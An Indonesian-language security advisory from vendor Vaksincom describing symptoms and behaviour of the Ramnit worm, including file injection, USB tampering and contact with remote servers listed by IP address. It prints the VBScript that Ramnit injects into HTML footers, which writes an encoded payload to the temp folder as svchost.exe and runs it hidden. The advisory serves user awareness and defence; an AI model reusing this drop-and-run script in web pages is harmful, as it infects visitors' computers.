Ciri Ramnit.net 2013

16 Mei 2013
Ciri Ramnit.net 2013
Artikel ini adalah artikel ke lima dari Vaksincom tentang Ramnit, artikel terdahulu tentang Ramnit bisa anda akses dari situs :
  • 31 Januari 2011. W32/Ramnit aka Win32.Siggen.8 http://vaksin.com/2011/0111/ramnit/ramnit.html
  • 16 Februari 2011. W32/Ramnit, kini dengan kemampuan eksploitasi LNK (Shortcut) http://vaksin.com/2011/0211/ramnit2/ramnit2.html
  • 10 Agustus 2011. Clean htm dan html terinjeksi Ramnit
http://www.vaksin.com/2011/0811/clean%20htm%20html%20from%20Ramnit/Clean%20htm%20html%20from%20Ramnit%20injection.html
  • 4 Agustus 2011. Basmi Tuntas Ramnit (1/2), Aji Kanuragan untuk menghadapi Ramnit
http://vaksin.com/2011/0811/immune%20from%20ramnit/Immune%20from%20Ramnit.htm

Pada artikel terdahulu sudah dijelaskan bagaimana sepak terjang Ramnit dan bagaimana cara membasminya. Vaksincom merasa perlu mengeluarkan artikel ke lima karena menurut pantauan Vaksincom sampai hari ini 12 Mei 2012 masih banyak situs di Indonesia yang terinfeksi Ramnit dan bahayanya jika setiap kali pengguna komputer mengakses situs tersebut, otomatis akan mendapatkan dropper file virus Ramnit dan ibarat ABG yang terancam oleh narkoba dan jika tidak mendapatkan informasi dan perlindungan yang baik dari lingkungannya (orang tua, teman) tentang bahaya narkoba, ABG akan terancam menjadi korban narkoba. Kalau dalam kasus Ramnit jelas komputer yang tidak mendapatkan perlindungan antivirus yang memiliki kemampuan mendeteksi dan mencegah infeksi Ramnit dari internet seperti Web Protection dari G Data Antivirus 2013 akan rentan menjadi korban Ramnit dengan akibat yang cukup merepotkan seperti :

Ciri dan gejala yang kasat mata
  • Muncul pop-up iklan atau pop-up dengan konten pornografi/perjudian
Dalam beberapa waktu tertentu, browser akan membuka pop-up iklan atau pop-up yang berisi konten pornografi atau perjudian (kasino). Hal ini yang terkadang membuat pengguna komputer menjadi tidak nyaman. (lihat gambar 1)
20130516I_ciriramnit201302
 Gambar 1, Pop-up iklan yang dijalankan W32/Ramnit
  • Icon Removable media (USB Flash) berubah menjadi icon Folder (lihat gambar 2)
20130516I_ciriramnit201305
 Gambar 2, Icon USB Flash yang diubah W32/Ramnit
  • User tidak dapat mengakses USB Flash dengan menampilkan pesan ”Access is denied” (lihat gambar 3)
20130516I_ciriramnit201301
 Gambar 3, Blok akses USB Flash
  • Muncul pesan “Compressed (zipped) Folders” pada saat mengakses Flash disk (lihat Gambar 4)
20130516I_ciriramnit201307
 Gambar 4, Pesan error saat akses USB Flash
  • Muncul banyak file dengan nama file “Copy of Shortcut to (1).lnk” s/d “Copy of Shortcut to (4).lnk” di USB Flash. (lihat gambar 5)
20130516I_ciriramnit201303
  • Salah satu hal yang unik dan membuat virus ini sangat mudah aktif dan sulit dibasmi adalah setiap kali user melakukan klik kanan, selain menampilkan menu klik kanan, secara tidak langsung pengguna komputer juga menjalankan virus ini.
Selain gejala yang kasat mata, Ramnit akan melakukan aksi berbahaya baik yang terlihat maupun tidak terlihat, namun akibatnya sangat terasa dan berbahaya untuk korbannya karena selain mencuri data dari komputer korbannya, ia juga melakukan pengunduhan malware lain yang tidak kalah berbahaya seperti Sality, Wapomi, Viking, Renosator, PWSTool, Alman, Kolab dan banyak malware berbahaya lainnya. Adapun lebih detailnya aksi Ramnit yang terkadang tidak kasat mata namun berbahaya dapat dilihat dari link di bawah ini.

Aksi Ramnit yang berbahaya
  • Muncul script error atau pop-up error setelah pop-up iklan yang muncul.
Setelah pop-up iklan yang muncul, akan muncul pop-up error atau script error dari browser. Muncul-nya script error ini mirip seperti virus "ARP Spoofing" pada tahun 2008. (lihat gambar 6)

20130516I_ciriramnit201304
 Gambar 6, Pop-up error atau script error
  • Injeksi file .exe, .dll
Sama seperti varian malware Sality, Alman dan Virut, W32/Ramnit melakukan injeksi file exe. Hanya saja, W32/Ramnit juga melakukan injeksi terhadap file DLL (dynamic load library). File exe dan dll yang diinjeksi akan bertambah sekitar antara 100 - 120 kb, tergantung varian Ramnit yang menginfeksi. Meskipun begitu, tidak semua file .exe dan .dll di drive C: yang diinjeksi.
  • Injeksi file HTM / HTML
Selain menginjeksi file .exe dan .dll, W32/Ramnit juga melakukan injeksi terhadap file HTM dan HTML. Injeksi dilakukan dengan menambahkan pada header dan footer. (lihat gambar 7).
Pada header, W32/Ramnit menambahkan script :
DropFileName = "svchost.exe"
20130516I_ciriramnit201309
 Gambar 7, Script yang ditambahkan pada header file HTML
  • Sedangkan pada footer, W32/Ramnit menambahkan script : (lihat gambar 8)

Set FSO = CreateObject ("Scripting.FileSystemObject")

DropPath = FSO.GetSpecialFolder(2) & '\" DropFileName

If FSO.FileExists(DropPath)=False Then

Set fileobj = FSO.CreateTextFile(DropPath, True)

For i = 1 To Len(WriteData) Step2

Fileobj.write chr (CLng("&H" & Mid(WriteData, i,2)))

Next

Fileobj.close

End If

Set WSHshell = CreateObject ("Wscript.shell")

WSHshell.Run DropPath, 0
20130516I_ciriramnit201311
 Gambar 8, Script yang ditambahkan pada footer file HTML
  • Membuat fungsi services Windows menjadi blank
Dengan aksi melakukan injeksi file pada file "iexplore.exe" dan file "services.exe", serta menambahkan script pada file web (htm/html) membuat fungsi dari services Windows menjadi blank. (lihat gambar 9)

20130516I_ciriramnit201312
Gambar 9, Fungsi Services Windows menjadi blank
  • Membuat komputer hang/lambat dan bahkan koneksi jaringan menjadi terputus. Beberapa gejala yang terjadi dan penyebabnya dapat dijelaskan sebagai berikut berdasarkan jenis file yang di injeksi Ramnit :
  • C:\WINDOWS\system32\svchost.exe, “svchost.ece” adalah file sistem yang berhubungan dengan koneksi jaringan. Akibatnya jaringan komputer akan terputus ketika file ini di injeksi.
  • C:\WINDOWS\system32\lsass.exe, “lsass.exe” adalah file sistem yang berhubungan dengan aktivitas komputer. Akibat injeksi ini, sistem komputer akan menjadi lambat / hang.
  • C:\WINDOWS\system32\services.exe, “services.exe” adalah file sistem yang berhubungan dengan services dan driver yang berjalan. Akibat injeksi ini akan menyebabkan gangguan pada servis dan driver yang di injeksi.
  • C:\Program Files\Internet Explorer\iexplore.exe, “iexplore.exe” adalah file browser Internet Explorer dari Microsoft. Tujuan injeksi ini adalah agar browser bisa dikontrol untuk melakukan koneksi ke remote server yang telah ditentukan oleh Ramnit sebelumnya.
  • Aktif pada proses memori
Seperti diutarakan di atas, setelah berhasil menguasai Internet Explorer, W32/Ramnit mencoba melakukan koneksi ke Remote Server menggunakan Internet Explorer yang telah di injeksi. Hal ini bisa kita lihat pada proses task manager, walaupun kita tidak sedang membuka IE / Internet Explorer (lihat gambar 10)
20130516I_ciriramnit201308
Gambar 10, Proses IEXPLORE.EXE (Internet Explorer) yang telah di-injeksi oleh W32/Ramnit
  • Melakukan koneksi ke Remote Server
Malware W32/Ramnit melakukan koneksi ke Remote Server untuk melakukan pengiriman informasi yang dibutuhkan pada Remote Server. Remote Server yang digunakan yaitu diantara-nya :

195.2.252.247

195.2.252.252

69.50.193.157

74.125.227.17

74.125.227.18

74.125.227.20

95.211.127.69

  • Melakukan transfer data ke Remote Server
Selain mencoba melakukan koneksi dan ber-komunikasi dengan remote server, W32/Ramnit juga mencoba melakukan transfer data dari komputer korban ke Remote Server dan sebaliknya mengirim file malware ke dalam komputer korban. (lihat gambar 11)

20130516I_ciriramnit201306
Gambar 11, Transfer data antara komputer korban dengan Remote Server
  • Melakukan broadcast
Sama seperti hal-nya worm Conficker, W32/Ramnit juga melakukan broadacast pada jaringan. Yang ber-beda adalah untuk W32/Ramnit hanya melakukan pada satu alamat yaitu : ADX.ADNXS.COM (lihat gambar 12)
20130516I_ciriramnit201310
 Gambar 12, Broadcast yang dilakukan oleh W32/Ramnit
Setelah artikel ini, PT. Vaksincom akan memberikan langkah-langkah membersihkan Ramnit dan bagaimana membuat komputer anda kebal dari Ramnit.
Salam,

Alfons Tanujaya
info@vaksin.com

PT. Vaksincom
Jl. R.P. Soeroso 7A Kav.A
Cikini, Jakarta 10330
Website : http://www.vaksin.com
http://www.virusicu.com
Fanpage : www.facebook.com/vaksincom

Twitter : @vaksincom
Ph : 021 3190 3800
Share by: